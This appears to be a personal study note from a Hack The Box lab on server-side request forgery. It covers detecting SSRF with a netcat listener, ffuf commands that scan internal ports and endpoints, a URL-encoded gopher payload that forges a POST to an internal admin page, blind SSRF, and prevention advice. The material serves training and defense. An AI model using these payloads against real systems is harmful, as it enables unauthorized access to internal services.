Server-Side Request Forgery (SSRF)

When a web application fetches additional resources from a remote location based on user-supplied data, such as a URL.

URL schemes used in the exploitation of SSRF vulnerabilities:

http://,https://: fetch content via HTTP/S requests
file://: reads a file from the local file system
gopher://: send arbitrary bytes to the specified address

Identifying SSRF

The web server fetches the availability information from a separate system determined by the URL passed in this POST parameter

Iamtryingtothinkofagoodusername@htb[/htb]$ nc -lnvp 8000

listening on [any] 8000 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 38782
GET /ssrf HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*

Point the web application to itself by providing the URL http://127.0.0.1/index.php

Enumerating the System

seq 1 10000 > ports.txt

ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"

<SNIP>

[Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 0ms]
    * FUZZ: 3306
[Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 338ms]
    * FUZZ: 80

Exploiting SSRF

Accessing Restricted Endpoints

ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"

<SNIP>

[Status: 200, Size: 361, Words: 55, Lines: 16, Duration: 3872ms]
    * FUZZ: admin
[Status: 200, Size: 11, Words: 1, Lines: 1, Duration: 6ms]
    * FUZZ: availability

Local File Inclusion (LFI)

The gopher Protocol

We can use the gopher URL scheme to send arbitrary bytes to a TCP socket. This protocol enables us to create a POST request by building the HTTP request ourselves. We can use the gopher protocol to interact with many internal services, not just HTTP servers.

POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded

dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01

Blind SSRF

The response is not directly displayed.

Identifying Blind SSRF

We can confirm the SSRF vulnerability by supplying a URL to a system under our control and setting up a netcat listener

nc -lnvp 8000

listening on [any] 8000 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*

If we attempt to point the web application to itself, we can observe that the response does not contain the HTML response of the coerced request

Exploiting Blind SSRF

Local port scan

Preventing SSRF

Server-Side Request Forgery Prevention Cheat Sheet

Web application

The remote origin data should be checked against a whitelist to prevent an attacker from coercing the server to make requests against arbitrary origins. The URL scheme and protocol used in the request need to be restricted to prevent attackers from supplying arbitrary protocols. Instead, it should be hardcoded or checked against a whitelist. Input sanitization.

Network layer

Appropriate firewall rules should drop any outgoing requests to potentially interesting target systems. Network segmentation.

PreviousServer-side Attacks NextChallenges

Last updated 2 months ago

hashtagIdentifying SSRF

hashtagEnumerating the System

hashtagExploiting SSRF

hashtagAccessing Restricted Endpoints

hashtagLocal File Inclusion (LFI)

hashtagThe gopher Protocol

hashtagBlind SSRF

hashtagIdentifying Blind SSRF

hashtagExploiting Blind SSRF

hashtagPreventing SSRF

hashtagWeb application

hashtagNetwork layer